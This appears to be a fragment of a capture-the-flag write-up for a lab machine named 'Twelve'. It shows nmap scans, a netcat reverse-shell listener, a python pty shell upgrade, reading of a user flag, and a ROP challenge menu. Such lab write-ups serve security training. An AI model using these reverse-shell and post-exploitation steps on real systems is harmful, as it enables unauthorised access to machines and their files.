# Nmap 7.95 scan initiated Sun Feb 15 18:31:08 2026 as: /usr/lib/nmap/nmap -p- -oA ports 192.168.0.102 Nmap scan report for 192.168.0.102 (192.168.0.102) Host is up (0.00056s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1212/tcp open lupa MAC Address: 86:8F:48:12:31:AE (Unknown)
# Nmap done at Sun Feb 15 18:31:09 2026 -- 1 IP address (1 host up) scanned in 1.50 seconds
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
# Nmap 7.95 scan initiated Sun Feb 15 18:31:34 2026 as: /usr/lib/nmap/nmap -sT -sC -sV -p 80,1212 -oA detail 192.168.0.102 Nmap scan report for 192.168.0.102 (192.168.0.102) Host is up (0.0015s latency).
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.66 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.66 (Debian) 1212/tcp open http Werkzeug httpd 2.2.2 (Python 3.11.2) |_http-server-header: Werkzeug/2.2.2 Python/3.11.2 |_http-title: Base-12 Converter MAC Address: 86:8F:48:12:31:AE (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Feb 15 18:31:41 2026 -- 1 IP address (1 host up) scanned in 6.85 seconds
┌──(kali㉿kali)-[~/HMV/twelve] └─$ nc -nvlp 1234 Listening on 0.0.0.0 1234 Connection received on 192.168.10.236 46274 python3 -c "import pty;pty.spawn('/bin/bash')" www-data@Twelve:/opt/twelve_app$ cd /home cd /home www-data@Twelve:/home$ ls ls debian lost+found www-data@Twelve:/home$ cd debian cd debian www-data@Twelve:/home/debian$ ls ls user.txt www-data@Twelve:/home/debian$ cat user.txt cat user.txt flag{user-8453eaca1baf2ad1abc7c17615fb8b91}
Welcome to an easy Return Oriented Programming challenge... Menu: 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit :